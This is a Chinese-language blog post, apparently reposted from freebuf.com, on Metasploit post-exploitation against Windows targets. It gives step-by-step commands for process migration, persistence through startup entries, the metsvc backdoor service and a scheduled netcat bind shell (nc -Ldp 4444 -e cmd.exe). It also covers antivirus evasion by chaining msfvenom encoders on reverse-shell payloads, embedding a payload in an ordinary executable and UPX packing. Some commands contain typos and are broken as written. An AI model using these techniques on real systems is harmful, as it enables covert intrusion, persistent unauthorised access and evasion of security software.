关于metasploit的木马免杀，维持以及进程迁移 – 作者:ZGMFX42s

hi，大家好，我是铁汉fhoenix。这里我为各位总结一下msf的免杀，维持以及进程迁移。

1.在目标运行M马，取得shell以后。可以先查询进程然后进行注入，这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入，并且自动迁移进程。

2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下，拿到shell以后输入run persistence -P windows/x64/meterper/reverse_tcp -X -i 5 -p 12345 -r 192.168.X.X 配置开机自启动，并且每次尝试连接的时间间隔为5秒。然后我们退出，输入exit，重新配置，开启监听后可以发现不要重新上传shell就可以立即拿到shell

3.通过metsvc模块可以在已经获取shell的设备上面开启一个服务来提供后M功能。自动安装后M run metsvc -A,他会自动创建一个端口为31337的服务，并且传输3个文件

4.通过scheduleme来创建计划任务，但是要system权限。在我们获取shell后输入getuid获取当前权限，运行getsystem把系统提升为system权限。这里我们又要用到大名鼎鼎的nc了，上传nc并创建计划任务，每分钟执行一次nc -Ldp 4444 -e cmd.exe，输入run scheduleme -m 1 -e ‘/nc.exe’ -o “-Ldp 4444 -e cmd.exe”。之后需要连接shell的时候直接输入nc -v 192.168.0.108 4444,用nc进行shell连接

5.通过autorunscript进行迁移进程。设定完lhost，lprot后输入set AutoRunScript post/windows/manage/migrate 然后run。我这里显示已经自动把进程迁移到了pid为1680的进

6.通过empire进行维持权限，他是一个基于powershell的渗透测试框架，具体我就不说了。github地址https:github.com/EmpireProject/Empire

下面是免S相关的内容：

通常msf裸奔肯定会被某绒查杀，所以使用msf多重编码是个好主意。上代码！

msfvenom -p windows/meterpreter/rever_tcp LHOST=192.168.0.100 LPORT=4444 -e x86/shiata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 –platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 –platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 –platform windows -i 10 -f exe -o a.exe

10次s编码，5次a编码，10次s编码，最后再来10次c编码。nice！

随便弄一个叫cc.exe的可执行文件。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -e x86/shikata_ga_nai -x cc.exe -i 5 -f exe -o cc2.exe

用shi对cc进行5次编码，当然你也可以进行多重编码。最后生成注入后的程序cc2。噢噢噢噢，对了你可以增加一个-k参数，配置攻击载荷在独立的线程内启动，这样不会对cc有所影响。

最后就是upx加壳

upx -5 cc2.exe -k                                OK，完美！

好的，希望各位看完以后会对自己有所帮助，我是黑客铁汉fhoenix，再见~

来源：freebuf.com 2021-07-29 17:03:01 by: ZGMFX42s